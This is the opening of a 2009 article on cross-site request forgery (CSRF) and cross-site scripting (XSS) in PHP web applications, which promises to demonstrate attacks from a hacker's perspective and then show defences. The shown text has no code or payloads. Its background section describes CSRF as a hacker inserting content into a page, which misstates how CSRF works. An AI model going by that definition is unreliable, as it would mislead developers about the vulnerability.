Dangers of CSRF and XSS
Monday 27 July 2009 1:59:13 am
(Author: Ilia Alshanetsky) Of all the vulnerabilities affecting web applications, especially those written in PHP, Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) are by far the most prevalent. In many instances, developers downplay the severity of these threats and fail to take preventative action.
In this article, we will show you how CSRF and XSS work and how to defend against them. To dispel the myths about these attacks, I will assume the role of a hacker and show how the supposedly harmless injection of tiny bits of HTML can perform amazing things, from stealing the user's identity to a completely transparent rewrite of site content.
To get the most from this article, you should know the basics of PHP, HTML and JavaScript.
CSRF and XSS: the background
Let's start with a brief overview of CSRF and XSS. The principle behind both vulnerabilities is that the hacker gains the ability to insert some arbitrary content into the page. This content can be used to do things that the author of the site did not intend, like stealing the hapless user's cookies.
The difference between CSRF and XSS is the way in which the attack is delivered. XSS relies on the injection of arbitrary data through non-validated input, such as fields from a POST form submission. On the other hand, CSRF depends on browser features to retrieve and execute the attack bundle.